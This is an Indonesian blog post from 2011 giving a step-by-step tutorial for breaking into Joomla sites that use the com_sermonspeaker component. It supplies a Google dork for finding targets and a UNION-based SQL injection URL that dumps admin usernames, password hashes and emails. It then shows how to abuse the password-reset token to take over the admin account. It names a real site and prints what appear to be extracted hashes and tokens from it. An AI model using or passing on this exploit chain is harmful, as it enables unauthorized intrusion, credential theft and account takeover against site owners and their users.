THOUSANDS OF FREE BLOGGER TEMPLATES

Selasa, 07 Juni 2011

hacking

Dork : inurl:option=com_sermonspeaker

Exploit :
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
1. Pertama cari dulu target di google.
Dork : inurl:option=com_sermonspeaker
2. Jika sudah ketemu tergetnya silahkan mencoba memasang exploit. Kali ini target kita adalah
ex: http://www.nmccenter.com/index.php?option=com_sermonspeaker
3. masukan exploit nya ex:
code:
http://www.nmccenter.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
hasil:
code:
admin:2a17ddd56dc9b5254de35b0a6ad1a726:EfnTMQuYn9DGrKEJvjHR9ibr3ULDzwWT:webadmin@nmccenter.com: Latest Sermons Sermons of admin:2a17ddd56dc9b5254de35b0a6ad1a726:EfnTMQuYn9DGrKEJvjHR9ibr3ULDzwWT:webadmin@nmccenter.com Sermon
username, email, passwordnya nanti keluar. nanti di encrypt password nya , 4.kemudian kita injeksikan dengan metode forgot password Code:
/index.php?option=com_user&view=reset
ex:
http://www.nmccenter.com//index.php?option=com_user&view=reset
nah dia minta E-mail Address: kita masukan email si admin tadi jadi E-mail Address: webadmin@nmccenter.com jika berhasil ada tulisan ini "Confirm your account." setelah selsai nanti ada pilihan masukan Token: Tambahkan ,0x3a,activation setelah 0x3a,email jadinya seperti ini
contoh:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/
hasil:
http://www.nmccenter.com//index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/
masukan nilai tokennya dan biasanya setelah email token itu
hasil:
admin:c3914b425c3b1fb1d190d2800f800163:Ah2RdE8Qyr4RDjqYGKEI1NHFicJrPDSp:webadmin@nmccenter.com:EfnTMQuYn9DGrKEJvjHR9ibr3ULDzwWT
nah kita ambil : EfnTMQuYn9DGrKEJvjHR9ibr3ULDzwWT jadi token: EfnTMQuYn9DGrKEJvjHR9ibr3ULDzwWT nanti setelah berhasil isi password baru. misal admin nanti kita login dengan user:Admin password:Admin <--password yang telah kita ubah kemudian tinggal masuk ke control pane admin nya dengan menambahkan administrator hasil: http://www.nmccenter.com/administrator tetapi berhubung si admin telah mempatchnya saya coba dengan cara lain yaitu masuk sebagai user nya dan hasilnya seperti ini http://www.nmccenter.com/index.php?option=com_kunena&Itemid=59&func=view&catid=2 kumpulan site nya bisa di coba :
code:

0 komentar: